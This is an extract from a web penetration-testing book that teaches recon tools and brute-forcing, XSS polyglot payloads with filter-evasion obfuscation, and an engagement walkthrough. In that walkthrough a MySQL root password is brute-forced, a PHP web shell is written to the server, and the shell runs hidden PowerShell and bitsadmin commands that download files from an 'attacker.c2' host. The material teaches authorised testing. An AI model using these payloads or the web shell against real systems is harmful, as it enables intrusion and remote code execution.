Becoming The Hacker - Adrian Pruteanu
Becoming The Hacker - Adrian Pruteanu
Every effort has been made in the preparation of this book to ensure
the accuracy of the information presented. However, the information
contained in this book is sold without warranty, either express or
implied. Neither the authors, nor Packt Publishing or its dealers and
distributors, will be held liable for any damages caused or alleged to
have been caused directly or indirectly by this book.
Livery Place
35 Livery Street
ISBN 978-1-78862-796-2
www.packtpub.com
mapt.io
Mapt is an online digital library that gives you full access to over
5,000 books and videos, as well as industry leading tools to help you
plan your personal development and advance your career. For more
information, please visit our website.
Why subscribe?
Spend less time learning and more time coding with practical
eBooks and Videos from over 4,000 industry professionals
Learn better with Skill Plans built especially for you
Get a free eBook or video every month
Mapt is fully searchable
Copy and paste, print, and bookmark content
Packt.com
Did you know that Packt offers eBook versions of every book
published, with PDF and ePub files available? You can upgrade to
the eBook version at www.Packt.com and as a print book customer,
you are entitled to a discount on the eBook copy. Get in touch with
us at [email protected] for more details.
In his spare time, Adrian likes to develop new tools and software to
aide with penetration testing efforts or just to keep users safe online.
He may occasionally go after a bug bounty or two, and he likes to
spend time researching and (responsibly) disclosing vulnerabilities.
A special thank you to my family and friends for their support and
mentorship, as well. I also thank my parents, in particular, for
bringing home that Siemens PC and showing me BASIC, igniting
my love for computers at a young age. They've always nurtured
my obsession with technology, and for that I am forever grateful."
About the reviewer
Babak Esmaeili has been working in the cyber security field for
more than 15 years. He started in this field from reverse engineering
and continued his career in the penetration testing field.
"I want to thank everyone who helped in writing this book, and I'd
like to thank my beloved parents and dearest friends for their
support."
Packt is searching for authors
like you
If you're interested in becoming an author for Packt, please
visit authors.packtpub.com and apply today. We have worked with
thousands of developers and tech professionals, just like you, to help
them share their insight with the global tech community. You can
make a general application, apply for a specific hot topic that we are
recruiting an author for, or submit your own idea.
Preface
Becoming the Hacker will teach you how to approach web
penetration testing with an attacker's mindset. While testing web
applications for performance is common, the ever-changing threat
landscape makes security testing much more difficult for the
defender.
Through the first part of the book, Adrian Pruteanu walks you
through commonly encountered vulnerabilities and how to take
advantage of them to achieve your goal. The latter part of the book
shifts gears and puts the newly learned techniques into practice,
going over scenarios where the target may be a popular content
management system or a containerized application and its network.
Chapter 5, File Inclusion Attacks, helps you explore the file inclusion
vulnerabilities. We also look at several methods to use an
application's underlying filesystem to our advantage.
Chapter 11, Attacking APIs, focuses our attention on APIs and how
to effectively test and attack them. All of the skills you have learned
up to this point will come in handy.
We also have other code bundles from our rich catalog of books and
videos available at https://github.com/PacktPublishing/. Check them
out!
Conventions used
There are a number of text conventions used throughout this book.
[default]
exten => s,1,Dial(Zap/1|30)
exten => s,2,Voicemail(u100)
exten => s,102,Voicemail(b100)
exten => i,1,Voicemail(s0)
[default]
exten => s,1,Dial(Zap/1|30)
exten => s,2,Voicemail(u100)
exten => s,102,Voicemail(b100)
exten => i,1,Voicemail(s0)
# cp /usr/src/asterisk-
addons/configs/cdr_mysql.conf.sample
/etc/asterisk/cdr_mysql.conf
Note
Warnings or important notes appear like this.
Tip
Tips and tricks appear like this.
Get in touch
Feedback from our readers is always welcome.
Piracy: If you come across any illegal copies of our works in any
form on the Internet, we would be grateful if you would provide us
with the location address or website name. Please contact us at
[email protected] with a link to the material.
Reviews
Please leave a review. Once you have read and used this book, why
not leave a review on the site that you purchased it from? Potential
readers can then see and use your unbiased opinion to make
purchase decisions, we at Packt can understand what you think
about our products, and our authors can see your feedback on their
book. Thank you!
Some assumptions about your knowledge level are made. To get the
most value out of reading this book, a basic knowledge of application
security should be there. Readers do not have to be experts in the
field of penetration testing or application security, but they should
have an idea about what cross-site scripting (XSS) or SQL
injection (SQLi) attacks are. We will not devote a chapter to the
standard "Hello World" example for XSS, but we will show the impact
of exploiting such a vulnerability. The reader should also be familiar
with the Linux command prompt and common console tools, such as
curl, git, and wget. Some familiarity with programming will certainly
help, but it is not a hard requirement.
Rules of engagement
Before moving forward with the fun stuff, it is important to always
remember the rules of engagement (ROE) when conducting an
attack. The ROE are typically written out in the pre-engagement
statement of work (SoW) and all testers must adhere to them. They
outline expectations of the tester and set some limits to what can be
done during the engagement.
Communication
Good communication is key to a successful engagement. Kickoff
and close-out meetings are extremely valuable to both parties
involved. The client should be well aware of who is performing the
exercise, and how they can reach them, or a backup, in case of an
emergency.
Has the scope changed since the document's last revision? Has
the target list changed? Should certain parts of the application
or network be avoided?
Is there a testing window to which you must adhere?
Are the target applications in production or in a development
environment? Are they customer-facing or internal only?
Are the emergency contacts still valid?
If credentials were provided, are they still valid? Now is the time
to check these again.
Is there an application firewall that may hinder testing?
The goal is generally to test the application and not third-party
defenses. Penetration testers have deadlines, while malicious actors
do not.
Tip
When testing an application for vulnerabilities, it is a good idea to
ask the client to whitelist out IPs in any third-party web
application firewalls (WAFs). WAFs inspect traffic reaching the
protected application and will drop requests that match known
attack signatures or patterns. Some clients will choose to keep
the WAF in an enforcing mode, as their goal may be to simulate
a real-world attack. This is when you should remind the clients
that firewalls can introduce delays in assessing the actual
application, as the tester may have to spend extra time
attempting to evade defenses. Further, since there is a time limit
to most engagements, the final report may not accurately reflect
the security posture of the application.
Tip
No manager wants to hear that their critical application may go
offline during a test, but this does occasionally happen. Some
applications cannot handle the increased workload of a simple
scan and will failover. Certain payloads can also break poorly-
designed applications or infrastructure, and may bring
productivity to a grinding halt.
Tip
If, during a test, an application becomes unresponsive, it's a
good idea to call the primary contact, informing them of this as
soon as possible, especially if the application is a critical
production system. If the client is unavailable by phone, then be
sure to send an email alert at minimum.
Privacy considerations
Engagements that involve any kind of social engineering or human
interaction, such as phishing exercises, should be carefully
handled. A phishing attack attempts to trick a user into following an
email link to a credential stealer, or opening a malicious attachment,
and some employees may be uncomfortable being used in this
manner.
Unless there is explicit written permission from the client, avoid the
following:
Note
Some web attacks, such as SQLi or XML External Entity (XXE),
may lead to data leaks, in which case you should inform the
client of the vulnerability as soon as possible and securely
destroy anything already downloaded.
- Bruce Schneier
Cleaning up
A successful penetration test or application assessment will
undoubtedly leave many traces of the activity behind. Log entries
could show how the intrusion was possible and a shell history file
can provide clues as to how the attacker moved laterally. There is a
benefit in leaving breadcrumbs behind, however. The defenders,
also referred to as the blue team, can analyze the activity during or
post-engagement and evaluate the efficacy of their defenses. Log
entries provide valuable information on how the attacker was able to
bypass the system defenses and execute code, exfiltrate data, or
otherwise breach the network.
There are many tools to wipe logs post-exploitation, but unless the
client has explicitly permitted these actions, this practice should be
avoided. There are instances where the blue team may want to test
the resilience of their security information and event monitoring
(SIEM) infrastructure (a centralized log collection and analysis
system), so wiping logs may be in scope, but this should be explicitly
allowed in the engagement documents.
That being said, there are certain artifacts that should almost always
be completely removed from systems or application databases when
the engagement has completed. The following artifacts can expose
the client to unnecessary risk, even after they've patched the
vulnerabilities:
Tip
Make a note of all malicious files, paths, and payloads used in
the assessment. At the end of the engagement, attempt to
remove as much as possible. If anything is left behind, inform the
primary contact, providing details and stressing the importance of
removing the artifacts.
Tip
Tagging payloads with a unique keyword can help to identify
bogus data during the cleanup effort, for example: "Please
remove any database records that contain the keyword:
2017Q3TestXyZ123."
Kali Linux
Previously known as BackTrack, Kali Linux has been the Linux
distribution of choice for penetration testers for many years. It is hard
to argue with its value, as it incorporates almost all of the tools
required to do application and network assessments. The Kali Linux
team also provides regular updates, keeping not only the OS but
also the attack tools current.
Burp Suite
Burp Suite is arguably the king when it comes to attack proxies. It
allows you to intercept, change, replay, and record traffic out of the
box. Burp Suite is highly extendable, with powerful community
plugins that integrate with sqlmap (the de facto SQLi exploitation
tool), automatically test for privilege escalation, and offer other useful
modules:
The attacker's job will always be easier than that of the defender.
Any professional hacker with experience in the corporate world will
attest to this. The attacker needs just one weak link in the chain —
even if that weakness is temporary — to own the environment
completely.
Security is difficult to do right the first time and it is even more difficult
to keep it close to the baseline as time passes. There are often
resourcing issues, lack of knowledge, or wrong priorities, including
simply making the organization profitable. Applications have to be
useable — they must be available and provide feature
enhancements to be useful. There never seems to be enough time
to test the code properly, let alone to test it for security bugs.
Types of assessments
Depending on the agreement with the client prior to the engagement,
you may have some of the information required, a lot of information,
or no information whatsoever. White-box testing allows for a
thorough examination of the application. In this case, the attackers
have essentially the same access as the developer. They not only
have authenticated access to the application, but also its source
code, any design documents, and anything else they'll need.
Note
For the remainder of this book, we will approach our targets from
a more gray-box perspective, simulating the typical engagement.
Target mapping
The traditional nmap of the entire port range, with service discovery, is
always a good place to start when gathering information on a target.
Nmap is the network scanning tool of choice and has been for many
years. It is still very powerful and very relevant. It is available on
most platforms, including Kali, BlackArch, and even Windows.
In the Kali console prompt, start the PostgreSQL service using the
service command. If successful, there should be no message
returned:
root@kali:~# msfconsole
[...]
msf > db_status
[*] postgresql selected, no connection
msf >
root@kali:~# msfconsole
[...]
msf >
The YML database configuration file, created with the msfdb init
command, can be passed to the db_connect Metasploit console
command as with the -y switch:
We can now create a workspace for the target application, which will
help us to organize results from various MSF modules, scans, or
exploits:
MSF's db_nmap takes the same switches as the normal nmap. In the
following example, we are scanning for common ports and
interrogating running services.
Note
Take note of the scope provided by the client. Some will
specifically constrain application testing to one port, or
sometimes even only one subdomain or URL. The scoping call is
where the client should be urged not to limit the attack surface
available to the tester.
Masscan
Nmap is fully featured, with a ton of options and capabilities, but
there is one problem: speed. For large network segments, Nmap can
be very slow and sometimes can fail altogether. It's not unusual for
clients to request a penetration test on a huge IP space with little
time allotted for the mapping and scanning phase.
We can see that the preceding scan was cancelled early with the Ctrl
+ C interrupt, and masscan saved its progress in a paused.conf file,
allowing us to resume the scan at a later time. To pick up where we
left off, we can use the --resume switch, passing the paused.conf file
as the parameter:
Figure 2.2: Resuming a masscan session
Masscan's results can then be fed into either Nmap for further
processing, or a web scanner for more in-depth vulnerability
discovery.
WhatWeb
Once we've identified one or more web applications in the target
environment with masscan or Nmap, we can start digging a bit
deeper. WhatWeb is a simple, yet effective, tool that can look at a
particular web application and identity what technologies have been
used to develop and run it. It has more than 1,000 plugins, which can
passively identify everything from what content management
system (CMS) is running on the application, to what version of
Apache or NGINX is powering the whole thing.
Nikto
Nikto provides value during the initial phases of the engagement. It
is fairly non-intrusive and with its built-in plugins, it can provide quick
insight into the application. It also offers some more aggressive
scanning features that may yield success on older applications or
infrastructure.
CMS scanners
When the target is using a CMS, such as Joomla, Drupal, or
WordPress, running an automated vulnerability testing tool should
be your next step.
WordPress is not alone in this space. Joomla and Drupal are also
very popular and sport many of the same vulnerabilities and
configuration issues that are seen in WordPress installations.
There are a few scanners available for free that aim to test for low-
hanging fruit in these CMSs:
Note
Before proceeding with a WordPress scan, make sure that it is
hosted inside the engagement scope. Some CMS
implementations will host the core site locally, but the plugins or
content directories are on a separate content delivery network
(CDN). These CDN hosts may be subject to a penetration testing
notification form before they can be included in the test.
We will cover CMS assessment tools, such as WPScan, in more
detail in later chapters.
Efficient brute-forcing
A brute-force attack typically involves a barrage of requests, or
guesses, to gain access or reveal information that may be otherwise
hidden. We may brute-force a login form on an administrative panel
in order to look for commonly used passwords or usernames. We
may also brute-force a web application's root directory looking for
common misconfiguration and misplaced sensitive files.
Note
An alternative, or supplement, to SecLists is FuzzDB. It is a
similar collection of files containing various payloads that can
help with brute-forcing, and it can also be downloaded from the
GitHub repository at https://github.com/fuzzdb-project/fuzzdb.
Grabbing the latest copy of SecLists is easy using git, a popular
version control system tool. We can pull down the repository using
the git clone command:
SecList
Description
Wordlist
You can make assumptions about the application based on the very
simple information shown in the preceding list. For example, an IIS
web server is more likely to have an application developed in
ASP.NET as opposed to PHP. While PHP is still available on
Windows (via XAMPP), it is not as commonly encountered in
production environments. In contrast, while there are Active Server
Pages (ASP) processors on Linux systems, PHP or Node.js are
much more common these days. While brute-forcing for files, you
can take this into account when attaching the extension to the
payload: .asp and .aspx for Windows targets, and .php for Linux
targets is a good start.
User-agent: *
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /~admin/
Google's crawlers will ignore the subdirectories, but you cannot. This
is valuable information for the upcoming scans.
Content discovery
We have already mentioned two tools that are very useful for initial
discovery scans: OWASP ZAP and Burp Suite. Burp's Intruder
module is throttled in the free version but can still be useful for quick
checks. Both of these attack proxies are available in Kali Linux and
can be easily downloaded for other distributions. There are other
command-line alternatives, such as Gobuster, which can be used to
automate the process a bit more.
Burp Suite
As mentioned, Burp Suite comes bundled with the Intruder module,
which allows us to easily perform content discovery. We can
leverage it to look for hidden directories and files, and even guess
credentials. It supports payload processing and encoding, which
enables us to customize our scanning to better interface with the
target application.
OWASP ZAP
The free alternative to Burp Suite is ZAP, a powerful tool in its own
right, and it provides some of the discovery capabilities of Burp
Suite.
The ZAP equivalent for Burp's Intruder is the Fuzzer module, and it
has similar functionality, as show in the following figure:
Figure 2.6: OWASP ZAP's Fuzzer module configuration. As ZAP is open-source, there are
no usage restrictions. If the goal is to perform a quick content discovery scan or credential
brute-force, it may be a better alternative to the free version of Burp Suite.
Gobuster
Gobuster is an efficient command-line utility for content discovery.
Gobuster does not come preinstalled on Kali Linux, but it is available
on GitHub. As its name implies, Gobuster was written in the Go
language and will require the golang compiler to be installed before it
can be used for an attack.
We can now pull the latest version of Gobuster from GitHub using
the git clone command:
If the commands don't produce output, the tool was compiled and is
ready for use:
root@kali:~/tools/gobuster# ./gobuster
Gobuster v1.3 OJ Reeves
(@TheColonial)
==================================================
===
[!] WordList (-w): Must be specified
[!] Url/Domain (-u): Must be specified
==================================================
===
root@kali:~/tools/gobuster#
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /~admin/
Make sure that the cursor is placed at the end of the URL in the left-
most pane. Click the Add button next to Fuzz Locations in the right-
most pane:
Figure 2.9: Fuzzer configuration, adding Fuzz Locations
On the next screen, we can add a new payload to feed the Fuzzer.
We will select the raft-small-files.txt wordlist from the SecLists
repository:
Figure 2.10: Fuzzer configuration – the Add Payload screen
Since we want to treat the /~admin URI as a directory and look for
files within, we will have to use a string processor for the selected
payload. This will be a simple Prefix String processor, which will
prepend a forward-slash to each entry in our list.
Figure 2.11: Fuzzer configuration – the Add Processor screen
The Fuzzer task may take a while to complete, and it will produce
lots of 403 or 404 errors. In this case, we were able to locate a
somewhat hidden administration file.
Figure 2.12: The completed Fuzzer scan shows an accessible hidden file
The HTTP 200 response indicates that we have access to this file,
even though the parent directory /~admin/ was inaccessible. It
appears we have access to the admin.html file contained within the
enticing admin directory.
Payload processing
Burp Suite's Intruder module is a powerful ally to an attacker when
targeting web applications. Earlier discovery scans have identified
the secretive, but enticing, /~admin/ directory. A subsequent scan of
the directory itself uncovered an unprotected admin.html file.
Before we proceed, we will switch to the Burp Suite attack proxy and
configure the Target Scope to the vuln.app.local domain:
Figure 2.13: The Burp Suite Target Scope configuration screen
The Target Scope allows us to define hosts, ports, or URLs that are
to be included in the scope of the attack. This helps to filter out traffic
that may not be related to our target. With Burp Suite configured as
our attack proxy, we can visit the hidden admin.html URL and record
the traffic in our proxy's history:
Figure 2.14: Accessing the hidden file through the browser succeeds
Since all of the interactions with the target are being recorded by the
Burp proxy, we can simply pass the failed request on to the Intruder
module, as shown in the following figure. Intruder will let us attack
the basic authentication mechanism with little effort:
Figure 2.16: The HTTP history screen
In the Intruder module, the defaults are good for the most part—we
just have to select the Base64-encoded credentials portion of the
Authorization header and click the Add button on the right-hand
side. This will identify this position in the HTTP request as the
payload location.
This figure shows that the list was loaded in payload position 1 using
the Load... button in the Payload Options:
Figure 2.20: Payload position 1 configuration screen
The separator for position 1 should be colon (:). For payload position
2, you can use the 500-worst-passwords.txt list from the SecLists
passwords directory.
Once the payload has been configured, we can begin the brute-force
using the Start Attack button in the top-right corner of the Intruder
module, as shown in the following figure:
Credential brute-forcing is just one of the many uses for Intruder. You
can get creative with custom payloads and payload processing.
This figure shows that the PDF's name, minus the extension, is
identified as the payload position using the Add button:
Figure 2.26: Intruder Payload Positions configuration screen
The following figure shows the Dates payload type options available
in Intruder:
Figure 2.27: Intruder's Payloads screen
In this attack, you will use the Dates payload type with the proper
date format, going back a couple of years. The payload processor
will be the MD5 hash generator, which will generate a hash of each
date and return the equivalent string. This is similar to our Base64-
encode processor from the previous attack.
Once again, the payload options have been configured and we can
start the attack.
The following figure shows a few requests with the 200 HTTP status
code and a large length indicating a PDF file is available for
download:
Intruder will generate the payload list based on our specified date
format and calculate the hash of the string, before sending it to the
application, all with a few clicks. In no time, we have discovered at
least three improperly protected, potentially sensitive documents that
are available anonymously.
Polyglot payloads
A polyglot payload is defined as a piece of code that can be
executed in multiple contexts in the application. These types of
payloads are popular with attackers because they can quickly test an
application's input controls for any weaknesses, with minimal noise.
Any one of the steps along the way can alter or block the payload,
which may make it more difficult to confirm the existence of a
vulnerability in the application. A polyglot payload will attempt to
exploit an injection vulnerability by combining multiple methods for
executing code in the same stream. This attempts to exploit
weaknesses in the application payload filtering, increasing the
chance that at least one portion of the code will be missed and will
execute successfully. This is made possible by the fact that
JavaScript is a very forgiving language. Browsers have always been
an easy barrier of entry for developers, and JavaScript is rooted in
a similar philosophy.
jaVasCript:/*-/*'/*\'/*'/*"/**/(/*
*/oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRi
pt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
At first glance, this appears rather messy, but every character has a
purpose. This payload was designed to execute JavaScript in a
variety of contexts, whether the code is reflected inside an HTML tag
or right in the middle of another piece of JavaScript. The browser's
HTML and JavaScript parsers are extremely accommodating. They
are case-insensitive, error-friendly, and they don't care much about
indenting, line endings, or spacing. Escaped or encoded characters
are sometimes converted back to their original form and injected into
the page. JavaScript in particular does its very best to execute
whatever code is passed to it. A good polyglot payload will take
advantage of all of this, and seek to evade some filtering as well.
The first thing a sharp eye will notice is that most of the keywords,
such as textarea, javascript, and onload, are randomly capitalized:
jaVasCript:/*-/*'/*\'/*'/*"/**/(/*
*/oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRi
pt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
This may seem like a futile attempt to evade application firewall input
filters, but you'd be surprised how many are poorly designed.
Consider the following regular expression (regex) input filter:
s/onclick=[a-z]+\(.+\)//g
Note
A regex is a piece of text defining a search pattern. Some WAFs
may use regex to try and find potentially dangerous strings inside
HTTP requests.
This will effectively prevent JavaScript code from being injected via
the onclick event, but with one glaring flaw: it doesn't take into
account case-sensitivity. Regular expressions have many modifiers,
such as the g in the preceding example, and by default most engines
require the i modifier to ignore case, or else they will not match and
the filter is vulnerable to bypass.
Tip
When assessing an application's regex-based input filter,
Regex101 is a great place to test it against several payloads at
once. Regex101 is an online tool available for free at
https://regex101.com.
jaVasCript:/*-/*'/*\'/*'/*"/**/(/*
*/oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRi
pt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Note
Scalable Vector Graphics (SVG) is an element on a page that
can be used to draw complex graphics on the screen without
binary data. SVG is used in XSS attacks mainly because it
provides an onload property, which will execute arbitrary
JavaScript code when the element is rendered by the browser.
Note
More examples of the power of this particular polyglot are on
Elsobky's GitHub page: https://github.com/0xSobky.
The URL encoded characters %0d and %0a represent newline and
carriage return. These characters are largely ignored by HTML and
JavaScript parsers, but they are significant in the HTTP request or
response header.
GET /save.php?remember=jaVasCript%3A%2F*-
%2F*%60%2F*%60%2F*'%2F*%22%2F**%2F(%2F*%20*%2FoNcl
iCk%3Dalert()%20)%2F%2F%0D%0A%0d%0a%2F%2F%3C%2FstY
le%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2
F-
-!%3E%3CsVg%2F%3CsVg%2FoNloAd%3Dalert()%2F%2F%3E%3
E HTTP/1.1
Host: www.cb2.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64;
rv:45.0) Gecko/20100101 Firefox/45.0
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: nginx/1.8.1
Set-Cookie:
remember_me=jaVasCript:/*-/*'/*\'/*'/*"/**/(/*
*/oNcliCk=alert() )//
//</stYle/</titLe/</teXtarEa/</scRipt/-
-!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Connection: close
Username saved!
This figure shows how the browser views the HTML code after the
payload has been processed:
This figure shows how the browser views the HTML code after the
payload has been processed:
We can test this behavior inside the browser console with the
preceding sample code:
(/* */oNcliCk=alert()
)
Code obfuscation
Not all application firewalls strip input of malicious strings and let the
rest go through. Some inline solutions will drop the connection
outright, usually in the form of a 403 or 500 HTTP response. In such
cases, it may be difficult to determine which part of the payload is
considered safe and which triggered the block.
By design, inline firewalls have to be fairly fast and they cannot
introduce significant delay when processing incoming data. The
result is usually simple logic when attempting to detect SQL
injection (SQLi) or XSS attacks. Random capitalization may not fool
these filters, but you can safely assume that they do not render on
the fly every requested HTML page, let alone execute JavaScript to
look for malicious behavior. More often than not, inline application
firewalls will look for certain keywords and label the input as
potentially malicious. For example, alert() may trigger the block,
while alert by itself would produce too many false-positives.
This figure shows how we can access the same function directly or
using array notation, with an "alert" string inside square brackets:
This figure shows how we can call the alert() function using the
obfuscated string:
jaVasCript:/*-/*'/*\'/*'/*"/**/(/*
*/oNcliCk=top[8680439..toString(30)]()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRi
pt/-
-!>\x3csVg/<sVg/oNloAd=top[8680439..toString(30)]
()//>\x3e
Tip
The top keyword is a synonym for window and can be used to
reference anything you need from the window object.
With just a minor change, the polyglot payload is still effective and is
now more likely to bypass rudimentary inline filters that may attempt
to filter or block the discovery attempts.
Brutelogic offers a great list of XSS payloads with many other ways
to execute code unconventionally at https
://brutelogic.com.br/blog/cheat-sheet/.
Resources
Consult the following resources for more information on penetration
testing tools and techniques:
Metasploit: https://www.metasploit.com/
WPScan: https://wpscan.org/
CMSmap: https://github.com/Dionach/CMSmap
Recon-NG (available in Kali Linux or via the Bitbucket
repository): https://bitbucket.org/LaNMaSteR53/recon-ng
OWASP XSS Filter Evasion Cheat Sheet:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_S
heet
Elsobky's GitHub page: https://github.com/0xSobky
Brutelogic cheat sheet: https://brutelogic.com.br/blog/cheat-
sheet/
SecLists repository: https://github.com/danielmiessler/SecLists
FuzzDB: https://github.com/fuzzdb-project/fuzzdb
Exercises
Complete the following exercises:
Time-tested tools, such as Nmap and Nikto, can give us a head start,
while WPScan and CMSmap can hammer away at complex CMS
that are frequently misconfigured and seldom updated. For larger
networks, masscan can quickly identify interesting ports, such as
those related to web applications, allowing for more specialized
tools, such as WhatWeb and WPScan, to do their job faster.
Web content and vulnerability discovery scans with Burp or ZAP can
be improved with proper wordlists from repositories, such as
SecLists and FuzzDB. These collections of known and interesting
URLs, usernames, passwords, and fuzzing payloads can greatly
improve scan success and efficiency.
Network assessment
We've seen in previous chapters that Metasploit's workspace feature
can be very useful. In the following engagement, we will make use of
it as well. First, we have to launch the console from the terminal
using the msfconsole command. Once Metasploit has finished
loading, it will drop us into the familiar msf > prompt.
root@kali:~# msfconsole
[*] StarTing the Metasploit Framework console...
msf >
Before we hammer away at the web interface and try to exploit some
obscure vulnerability, let's take a step back and see what other
services are exposed on the API's server. The hope here is that
while the API itself may have been closely scrutinized by developers,
who may have taken security seriously during the development life
cycle, mistakes may have been made when deploying the server
itself. There are many aspects of system hardening that simply
cannot be controlled within the source code repository. This is
especially true when the server housing the target application is a
shared resource. This increases the likelihood that the system
security policy will loosen up over time as different teams with
different requirements interact with it. There could be some
development instance with less stringent controls running on a non-
standard port, or a forgotten and vulnerable application that can give
us (as an attacker) the required access, and we can easily
compromise the target.
Since we've wrapped the Nmap scan using the Metasploit db_nmap
command, the results are automatically parsed and written to our
workspace's database. Once the scan is complete, we can review
the entries in the database by issuing the services command:
Instead of going at the application head on, over port 80, we hope to
attack it via the exposed MySQL (MariaDB) services, as this attack
path figure shows:
The Basic options: will list the variables we will need to update in
order for the module to execute properly. The RHOSTS, RPORT, and
THREADS parameters are required for this particular scanner. RHOSTS,
or remote hosts, and RPORT, or remote port, should be self-
explanatory. The THREADS option can be increased to a higher
number to increase scan speed, but since we are only targeting one
remote host, api.ecorp.local, we don't need more than one
scanning thread.
With the module loaded, we can set the required RHOSTS variable to
the appropriate target. Since the target was already scanned by
db_nmap, and the results are in the ecorp workspace, we can use the
services command to set the RHOSTS variable automatically to all
MySQL servers found, as follows:
There are other ways to query the services in the workspace. For
example, in the preceding command-line input, we used the -s
option, which filters all hosts running MySQL as an identified service.
It appears that the module was able to identify the MySQL server
version successfully. This will prove useful when looking for known
vulnerabilities.
If we issue another services query, you will notice that the info field
for the mysql service has changed to the results of the mysql_version
scan, as follows:
Where our Nmap scan fell short in identifying the version number,
Metasploit succeeded and automatically changed the database to
reflect this. After reviewing the public CVEs for MySQL, however, it
doesn't appear that this instance has any unauthenticated
vulnerabilities.
Back in the Kali Linux terminal, we can use the mysql client
command to attempt to authenticate as root (-u) to the
api.ecorp.local host (-h):
root@kali:~# mysql -uroot -hapi.ecorp.local
ERROR 1045 (28000): Access denied for user
'root'@'attacker.c2' (using password: NO)
root@kali:~#
Note the lack of space between the -u and -h switches and their
respective values. A quick check for an empty root password fails,
but it proves that the MySQL server is accepting connections from
remote addresses.
Credential guessing
Since we were unable to uncover a working remote exploit for the
MySQL instance, the next step is to attempt a credentialed brute-
force attack against the default MySQL root user. We will use one of
our curated commonly used password dictionaries and hope this
instance was not properly secured during deployment.
Before continuing, we will set the following values to make the scan
a bit more efficient and reduce some noise:
Increasing the THREADS count will help you to get through the scan
more quickly, although it can be more noticeable. More threads
means more connections to the service. If this particular host is not
very resilient, we may crash it, thereby alerting the defenders. If our
goal is to be quieter, we can use only one thread but the scan will
take much longer. The VERBOSE variable should be set to false, as
you will be testing lots of passwords and the console output can get
messy. An added bonus to non-verbose output is that it improves the
scan time significantly, since Metasploit does not have to output
something to the screen after every attempt. Finally, with
STOP_ON_SUCCESS set to true, we will stop the attack if we have a
successful login.
This is a good place to start. There are other top variations of the 10
million password list file, and if this one fails to produce a valid login,
we can try the top 1,000, 10,000, or other wordlists.
Much like every other module in Metasploit, the run command will
begin execution:
We can connect directly from our Kali Linux instance using the mysql
command once more. The -u switch will specify the username and
the -p switch will let us pass the newly discovered password. There's
no space between the switches and their values. If we omit a value
for -p, the client will prompt us for a password.
Tip
There is a Metasploit module (surprise, surprise) that can deliver
executables and initiate a reverse shell using known credentials.
For Windows machines, exploit/windows/mysql/mysql_payload
can upload a Meterpreter shell and execute it, although there are
some drawbacks. A standard Metasploit payload will likely be
picked up by antivirus (AV) software and alert the defenders to
your activities. Bypassing AVs is possible with a fully
undetectable (FUD) Metasploit payload, but for the scenario in
this chapter, we will go with a simpler, less risky option.
Now let's find out where we are on the disk, so that we can write the
payload to the appropriate web application directory. The SHOW
VARIABLES SQL query lets us see configuration data and the WHERE
clause limits the output to directory information only, as shown here:
root@kali:~# curl
http://api.ecorp.local/xampp/.version
5.6.31
root@kali:~#
Back to the MySQL command-line interface, and we can try to write
to that directory using MySQL's SELECT INTO OUTFILE query. If we can
put a PHP file somewhere inside htdocs, we should be able to call it
from a web browser or curl, and we will have code execution.
Let's plug in some test values and see if we can write to the target
directory, and more importantly, if the application web server will
process our PHP code correctly:
Note
The ECorpAppTest11251 flag is added as a comment, in case we
are unable to clean up this shell after the test is complete, and
have to report it to the client's blue team. It can also help the blue
team to identify files that may have been missed as part of the
incident response exercise. This is not always required, but it is
good practice, especially with high-risk artifacts.
This is good: the query was successful. We can check to see if the
PHP interpreter works in this directory, and if the file is successfully
executed, by calling it from the browser, as shown in the following
screenshot:
Figure 3.6: The PHP code executing successfully
If we pass data from the GET request into the PHP built-in system()
function, we can execute arbitrary commands on the server itself.
To easily write the shell code to the disk using MySQL's SELECT INTO
OUTFILE statement, we can compress it down to one line. Thankfully,
PHP is not very concerned with carriage returns, as long as the code
is properly segregated by semicolons and curly braces. We can
compress our web shell into the following line:
<?php if (md5($_GET['password']) ==
'4fe7aa8a3013d07e292e5218c3db4944') {
system($_GET['cmd']); } ?>
root@kali:/var/www/html# python -m
SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
The hard part is over. Now we just have to get shell.php onto the
target server using the existing shell xampp.php. There are a couple
of ways to do this. On Linux servers, wget is almost always available
and simple to use. For Windows, you can leverage either the built-in
bitsadmin.exe or a sexier powershell.exe one-liner.
root@kali:/var/www/html# curl -G
http://api.ecorp.local/xampp/xampp.php --data-
urlencode "password=ECorpAppTest11251&
cmd=powershell -w hidden -noni -nop -c (new-object
net.webclient).DownloadFile('http://attacker.c2/te
st.php','c:\xampp\htdocs\xampp\test.php')"
root@kali:/var/www/html#
Curl has a --data-urlencode option, which will, you guessed it, URL
encode our command so that it passes through HTTP without
causing any problems. The -G switch ensures that the encoded data
is passed via a GET request.
root@kali:/var/www/html# curl -G
http://api.ecorp.local/xampp/xampp.php --data-
urlencode
"password=ECorpAppTest11251&cmd=bitsadmin
/transfer myjob /download /priority high
